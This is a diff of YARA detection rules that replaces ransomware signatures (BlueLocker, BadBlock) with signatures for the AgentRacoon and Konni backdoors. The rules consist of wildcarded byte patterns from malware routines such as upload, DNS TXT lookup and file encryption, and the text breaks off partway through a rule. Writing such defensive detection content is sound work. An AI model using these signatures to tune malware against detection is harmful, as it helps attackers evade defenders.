"145ff05e-c90d-598a-a3d5-220bd6df718a" - date = "2022-08-04" - modified = "2022-08-04" + id = "ad74d530-ffbd-589f-b941-3a5d9ec737b6" + date = "2023-12-15" + modified = "2023-12-15" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BlueLocker.yara#L1-L130" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "fbe5f246f4554e63b5da6a0aca169e8221a84fce18fd437ae7ad9b068e9ca576" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/ByteCode.MSIL.Backdoor.AgentRacoon.yara#L1-L128" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "3ba73f19f59c2e5880df820c52f16997047d7299eb14d421ae2ed8f3790bcfe9" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BlueLocker" + tc_detection_type = "Backdoor" + tc_detection_name = "AgentRacoon" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files_p1 = { - 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 8B 75 ?? 57 - 8B 7D ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 56 89 55 ?? 89 75 ?? - 89 45 ?? 89 7D ?? FF 15 ?? ?? ?? ?? 8B D8 C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 53 FF 15 - ?? ?? ?? ?? 8B 55 ?? 33 C9 0B C8 89 55 ?? 89 4D ?? 83 FB ?? 75 ?? 0B C3 5F 5E 5B 8B - 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 6A ?? 56 FF 15 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8B - F0 FF 15 ?? ?? ?? ?? 33 C9 03 F0 83 C6 ?? 0F 92 C1 F7 D9 0B CE 51 E8 ?? ?? ?? ?? 8B - F0 83 C4 ?? 89 75 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 75 ?? FF 15 ?? ?? ?? ?? 50 FF 75 ?? - 56 E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 85 C9 0F 8C ?? ?? - ?? ?? 8B 45 ?? 0F 8F ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 85 C9 0F 8F ?? ?? - ?? ?? 7C ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? 6A ?? 53 FF 15 ?? ?? ?? ?? 8B 55 ?? 8D - 4D ?? D1 E8 89 45 ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 + $unpack_response_p1 = { + 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 18 91 9C 11 ?? 73 ?? ?? ?? ?? 0A 06 16 6F ?? ?? + ?? ?? 2D ?? 73 ?? ?? ?? ?? 7A 17 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 19 91 9C 11 ?? 73 + ?? ?? ?? ?? 0A 06 1A 6F ?? ?? ?? ?? 2C ?? 06 1B 6F ?? ?? ?? ?? 2C ?? 06 1C 6F ?? ?? + ?? ?? 2C ?? 06 1D 6F ?? ?? ?? ?? 2C ?? 73 ?? ?? ?? ?? 7A 1F ?? 0B 2B ?? 07 17 58 0B + 03 07 91 2D ?? 07 17 58 0B 03 8E 69 07 59 0C 08 8D ?? ?? ?? ?? 0D 03 07 09 16 08 28 + ?? ?? ?? ?? 1A 13 ?? 2B ?? 11 ?? 17 58 13 ?? 09 11 ?? 91 2D ?? 11 ?? 17 58 13 ?? 09 + 8E 69 11 ?? 59 0C 08 8D ?? ?? ?? ?? 13 ?? 09 11 ?? 11 ?? 16 08 28 ?? ?? ?? ?? 02 12 + ?? FE 15 ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? + 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? + ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? + ?? 12 ?? 07 1F ?? 59 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? + ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 11 ?? 1A 59 8D ?? ?? ?? ?? 7D ?? + ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? + ?? 12 ?? 1A 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 12 ?? 18 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 + ?? 7D ?? ?? ?? ?? 03 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 18 } - $encrypt_files_p2 = { - 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B - C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? - 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? - 0B C8 53 89 4D ?? FF D7 33 F6 8D 45 ?? 56 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 - ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 0F 1F 40 ?? FF 75 ?? BA ?? ?? ?? ?? 8D 4D ?? E8 - ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 53 FF D7 6A - ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? - 8B 45 ?? 03 F0 3B 75 ?? 0F 87 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 6A ?? 8D - 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 75 ?? E9 ?? ?? ?? - ?? 85 C9 7F ?? 7C ?? 3D ?? ?? ?? ?? 73 ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B - 3D ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 75 ?? 8B CB 57 8B D6 E8 ?? ?? ?? ?? 8B 3D - ?? ?? ?? ?? 83 C4 ?? E9 ?? ?? ?? ?? 8B 55 ?? 8D 4D ?? E8 ?? ?? ?? ?? 0F B6 4F ?? 0F + $unpack_response_p2 = { + 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1A 02 7C ?? ?? ?? ?? 7B ?? + ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1C 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? + ?? ?? 03 1E 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? + ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 03 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? + ?? 16 07 1F ?? 59 28 ?? ?? ?? ?? 09 16 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? + ?? ?? ?? 09 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 09 1A 02 7C ?? + ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? 1A 59 28 ?? ?? ?? ?? 11 ?? 16 02 7C ?? ?? ?? ?? 7B + ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 11 ?? 18 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 + ?? ?? ?? ?? 11 ?? 1A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 1A 28 ?? ?? ?? ?? 11 ?? 1E + 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 18 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 2C ?? 02 7C ?? + ?? ?? ?? 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 11 ?? 1F ?? 91 13 ?? 02 7C ?? ?? ?? ?? 11 ?? + 8D ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? 1F ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 16 11 ?? + 28 ?? ?? ?? ?? 2A } - $encrypt_files_p3 = { - 57 C0 0F B6 47 ?? C1 E1 ?? 0B C8 66 0F 13 45 ?? 0F B6 47 ?? C1 E1 ?? 0B C8 C7 45 ?? - ?? ?? ?? ?? 0F B6 07 C1 E1 ?? 0B C8 C7 45 ?? ?? ?? ?? ?? 0F B6 47 ?? 89 4D ?? 0F B6 - 4F ?? C1 E1 ?? 0B C8 0F B6 47 ?? 6A ?? 6A ?? FF 75 ?? C1 E1 ?? FF 75 ?? 0B C8 0F B6 - 47 ?? 8B 3D ?? ?? ?? ?? C1 E1 ?? 0B C8 53 89 4D ?? FF D7 8B 35 ?? ?? ?? ?? 8D 45 ?? - 6A ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 85 C0 74 ?? FF 75 ?? BA ?? ?? ?? ?? - 8D 4D ?? E8 ?? ?? ?? ?? 8B 4D ?? 83 C4 ?? 33 C0 F7 D9 13 C0 6A ?? 6A ?? F7 D8 50 51 - 53 FF D7 6A ?? 8D 45 ?? 50 FF 75 ?? 68 ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 85 C0 74 ?? - 81 7D ?? ?? ?? ?? ?? 72 ?? 6A ?? 8D 45 ?? 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF D6 - 85 C0 75 ?? 8B 75 ?? 6A ?? 0F 57 C0 6A ?? 66 0F 13 45 ?? FF 75 ?? FF 75 ?? 53 FF D7 - 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D0 C7 45 ?? ?? ?? ?? ?? 83 C4 ?? 89 55 ?? C7 - 45 ?? ?? ?? ?? ?? 85 D2 74 ?? 8B FA B9 ?? ?? ?? ?? F3 A5 8B 4D ?? 68 ?? ?? ?? ?? 8B - 01 8B 49 ?? 89 82 ?? ?? ?? ?? 8D 45 ?? 50 52 6A ?? 6A ?? 6A ?? FF 75 ?? 89 8A ?? ?? - ?? ?? FF 15 ?? ?? ?? ?? 8B 75 ?? 85 C0 74 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? 56 53 FF 15 - ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 33 F6 EB ?? 83 CE ?? 85 DB 74 ?? 53 FF 15 ?? - ?? ?? ?? 8B 7D ?? 57 FF 75 ?? FF 15 ?? ?? ?? ?? EB ?? 8B 7D ?? 57 E8 ?? ?? ?? ?? 8B - 4D ?? 83 C4 ?? 8B C6 33 CD 5F 5E 5B E8 ?? ?? ?? ?? 8B E5 5D C3 + $upload = { + 28 ?? ?? ?? ?? 0A 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 2D ?? DD ?? ?? ?? ?? 16 0B 38 ?? + ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 0C 06 02 7C ?? ?? ?? ?? + 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 28 ?? ?? ?? ?? 02 7C ?? ?? ?? ?? + 7B ?? ?? ?? ?? 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 72 ?? ?? ?? ?? A2 11 ?? 17 02 7C ?? + ?? ?? ?? 7B ?? ?? ?? ?? 07 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? ?? 06 + A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? + 7B ?? ?? ?? ?? 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 07 + 14 6F ?? ?? ?? ?? 07 17 58 0B 07 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 3F + ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7C ?? ?? ?? ?? 73 ?? + ?? ?? ?? 7D ?? ?? ?? ?? DE 23 0D 02 7C ?? ?? ?? ?? 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 09 + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? DE ?? 2A } - $find_files_p1 = { - FF 74 B4 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 46 83 - FE ?? 7C ?? FF 74 24 ?? FF D7 68 ?? ?? ?? ?? 8B F0 FF D7 03 F0 8D 84 24 ?? ?? ?? ?? - 6A ?? 50 FF D7 8D 0C 06 33 C0 83 C1 ?? 0F 92 C0 F7 D8 0B C1 50 E8 ?? ?? ?? ?? 8B F0 - 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 ?? ?? ?? - ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 E8 ?? ?? - ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? - 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 8B 7C 24 ?? 83 C4 ?? 83 C7 ?? 57 FF 15 ?? ?? ?? - ?? 6A ?? 6A ?? E8 ?? ?? ?? ?? 8B C8 83 C4 ?? 85 C9 74 ?? 8B 54 24 ?? C7 01 ?? ?? ?? - ?? C7 41 ?? ?? ?? ?? ?? 83 7A ?? ?? 75 ?? 89 4A ?? 89 4A ?? 57 89 31 FF 15 ?? ?? ?? - ?? E9 ?? ?? ?? ?? 8B 42 ?? 89 48 ?? 8B 42 ?? 8B 40 ?? 89 42 ?? 89 30 57 FF 15 ?? ?? - ?? ?? E9 ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 33 F6 C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 - ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? - ?? C7 44 24 ?? ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? FF 74 B4 ?? 8D 84 24 + $perform_request = { + 05 6F ?? ?? ?? ?? 0A 06 04 3D ?? ?? ?? ?? 06 04 19 5B 18 5A 3F ?? ?? ?? ?? 05 16 06 + 19 5B 6F ?? ?? ?? ?? 0B 05 06 19 5B 06 19 5B 6F ?? ?? ?? ?? 0C 05 06 19 5B 18 5A 6F + ?? ?? ?? ?? 0D 02 07 28 ?? ?? ?? ?? 0B 02 08 28 ?? ?? ?? ?? 0C 02 09 28 ?? ?? ?? ?? + 0D 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 07 + A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 08 A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 09 + A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 28 ?? ?? ?? ?? A2 11 ?? 1F ?? 72 ?? ?? ?? + ?? A2 11 ?? 1F ?? 02 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 38 ?? ?? ?? ?? 06 + 04 19 5B 18 5A 3D ?? ?? ?? ?? 06 04 19 5B 3F ?? ?? ?? ?? 05 16 06 18 5B 6F ?? ?? ?? + ?? 13 ?? 05 06 18 5B 6F ?? ?? ?? ?? 13 ?? 02 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 11 ?? 28 + ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? + A2 11 ?? 18 11 ?? A2 11 ?? 19 72 ?? ?? ?? ?? A2 11 ?? 1A 11 ?? A2 11 ?? 1B 72 ?? ?? + ?? ?? A2 11 ?? 1C 02 28 ?? ?? ?? ?? A2 11 ?? 1D 72 ?? ?? ?? ?? A2 11 ?? 1E 02 7B ?? + ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 2B ?? 02 05 28 ?? ?? ?? ?? 13 ?? 1D 8D ?? ?? + ?? ?? 13 ?? 11 ?? 16 03 A2 11 ?? 17 72 ?? ?? ?? ?? A2 11 ?? 18 11 ?? A2 11 ?? 19 72 + ?? ?? ?? ?? A2 11 ?? 1A 02 28 ?? ?? ?? ?? A2 11 ?? 1B 72 ?? ?? ?? ?? A2 11 ?? 1C 02 + 7B ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 10 ?? 05 2A } - $find_files_p2 = { - 50 FF D3 85 C0 0F 85 ?? ?? ?? ?? 46 83 FE ?? 7C ?? 6A ?? FF 74 24 ?? FF D7 8B F0 8D - 84 24 ?? ?? ?? ?? 50 FF D7 03 F0 33 C0 83 C6 ?? 0F 92 C0 F7 D8 0B C6 50 E8 ?? ?? ?? - ?? 8B F0 83 C4 ?? 85 F6 0F 84 ?? ?? ?? ?? FF 74 24 ?? FF D7 48 50 FF 74 24 ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 50 56 - E8 ?? ?? ?? ?? 83 C4 ?? D1 E8 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 75 ?? 56 E8 ?? ?? ?? ?? EB ?? 6A ?? 6A ?? E8 ?? ?? - ?? ?? 8B D8 83 C4 ?? 85 DB 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 57 EB ?? 57 68 ?? ?? ?? - ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 53 6A ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? - 85 C0 74 ?? 8B 54 24 ?? 53 57 56 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? - 57 E8 ?? ?? ?? ?? 83 C4 ?? 53 E8 ?? ?? ?? ?? 8B 1D ?? ?? ?? ?? 83 C4 ?? 8B 35 ?? ?? - ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? FF 15 + $get_txt_record = { + 14 0A 03 73 ?? ?? ?? ?? 0B 07 6F ?? ?? ?? ?? 0C 7E ?? ?? ?? ?? 1F ?? 73 ?? ?? ?? ?? + 0D 09 08 08 8E 69 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? + 09 12 ?? 6F ?? ?? ?? ?? 13 ?? 09 6F ?? ?? ?? ?? 07 11 ?? 6F ?? ?? ?? ?? 07 6F ?? ?? + ?? ?? 13 ?? 28 ?? ?? ?? ?? 12 ?? 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? DE ?? 26 72 ?? + ?? ?? ?? 13 ?? DE ?? 11 ?? 2A } - $create_crypt_context = { - 55 8B EC 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? FF 15 ?? - ?? ?? ?? 6A ?? 50 FF 15 ?? ?? ?? ?? 85 C0 74 ?? 83 C8 ?? 8B 4D ?? 33 CD E8 ?? ?? ?? - ?? 8B E5 5D C2 ?? ?? 56 8B 35 ?? ?? ?? ?? 8D 45 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? - ?? 6A ?? 50 FF D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF - D6 85 C0 75 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 75 ?? - 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 50 8D 45 ?? 50 FF D6 85 C0 0F 84 ?? ?? ?? ?? 6A - ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 74 ?? 68 ?? ?? ?? ?? 56 6A ?? - FF 15 ?? ?? ?? ?? 8D 45 ?? 89 35 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? FF 35 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D - 04 45 ?? ?? ?? ?? 50 FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? FF 15 ?? - ?? ?? ?? 85 C0 75 ?? 50 50 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF 15 ?? - ?? ?? ?? 8B 45 ?? 5E 85 C0 74 ?? 6A ?? 50 FF 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 4D ?? - 33 C0 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2 + $main_loop = { + 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? + ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 18 16 16 6F ?? ?? ?? ?? 0A 06 28 + ?? ?? ?? ?? 2D ?? 2A 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 2A 7E ?? ?? + ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? + ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 12 ?? 7B ?? ?? ?? ?? 0D 12 ?? 7B + ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 16 13 ?? 2B ?? 7E ?? ?? ?? ?? 19 11 ?? 11 ?? + 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 14 80 ?? ?? ?? ?? 2A 11 ?? 7E ?? ?? ?? ?? 28 ?? + ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 20 ?? ?? ?? ?? 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? ?? + ?? ?? 11 ?? 17 58 13 ?? 11 ?? 09 32 ?? 7E ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 0B 73 ?? + ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? ?? 07 6F ?? ?? ?? ?? 6F ?? ?? ?? + ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 7E ?? ?? ?? ?? 07 + 17 6F ?? ?? ?? ?? 13 ?? 11 ?? 7E ?? ?? ?? ?? 1A 16 16 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? + 11 ?? 6F ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 DD ?? ?? ?? ?? 26 DE ?? 2A } condition: - uint16(0)==0x5A4D and ( all of ($find_files_p*)) and ($create_crypt_context) and ( all of ($encrypt_files_p*)) + uint16(0)==0x5A4D and ( all of ($unpack_response_p*)) and ($upload) and ($perform_request) and ($get_txt_record) and ($main_loop) } -rule REVERSINGLABS_Win32_Ransomware_Badblock : TC_DETECTION MALICIOUS MALWARE FILE +rule REVERSINGLABS_Win64_Backdoor_Konni : TC_DETECTION MALICIOUS MALWARE FILE { meta: - description = "Yara rule that detects BadBlock ransomware." + description = "Yara rule that detects Konni backdoor." author = "ReversingLabs" - id = "a5afb7d6-4bc1-5465-a35d-fe40e7f11c3e" - date = "2020-07-15" - modified = "2020-07-15" + id = "c45c23c6-be15-58cc-ae4d-631bed4a3bb2" + date = "2023-12-07" + modified = "2023-12-07" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BadBlock.yara#L1-L100" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "421e6a3772eeec6ef0cbb2427b7e044b450a2b2146cee2ca7d8c3a3a92918557" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/backdoor/Win64.Backdoor.Konni.yara#L1-L205" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "37c45e3ed23ca9f4de876f666c9f6d9bf7eee5cb1650b02cdd9f58e2ccc4b5cb" score = 75 quality = 90 tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" status = "RELEASED" sharing = "TLP:WHITE" category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BadBlock" + tc_detection_type = "Backdoor" + tc_detection_name = "Konni" tc_detection_factor = 5 importance = 25 strings: - $encrypt_files = { - 55 8B EC 83 C4 ?? 53 56 57 33 DB 89 5D ?? 89 5D ?? 89 5D ?? 89 4D ?? 89 55 ?? 8B D8 - 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8D 55 ?? 8B 45 ?? - 8B 40 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C3 E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 55 - ?? 8B 45 ?? 8B 40 ?? E8 ?? ?? ?? ?? 8D 45 ?? 8B 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 - ?? B2 ?? E8 ?? ?? ?? ?? 84 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 8D - 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? - ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? 8B D0 8B 45 ?? 85 C0 74 ?? 83 E8 ?? 8B 00 6A ?? 50 52 - 8B 45 ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 6A ?? 8B 45 ?? 50 68 ?? ?? ?? ?? 8B 45 ?? 50 - E8 ?? ?? ?? ?? 8B 45 ?? 50 E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 - 6A ?? 6A ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 8B 10 FF 12 89 45 ?? 89 55 ?? E9 ?? ?? - ?? ?? 83 7D ?? ?? 75 ?? 81 7D ?? ?? ?? ?? ?? 73 ?? EB ?? 7D ?? 8B 45 ?? 89 45 ?? 8B - 45 ?? 89 45 ?? EB ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 8B 45 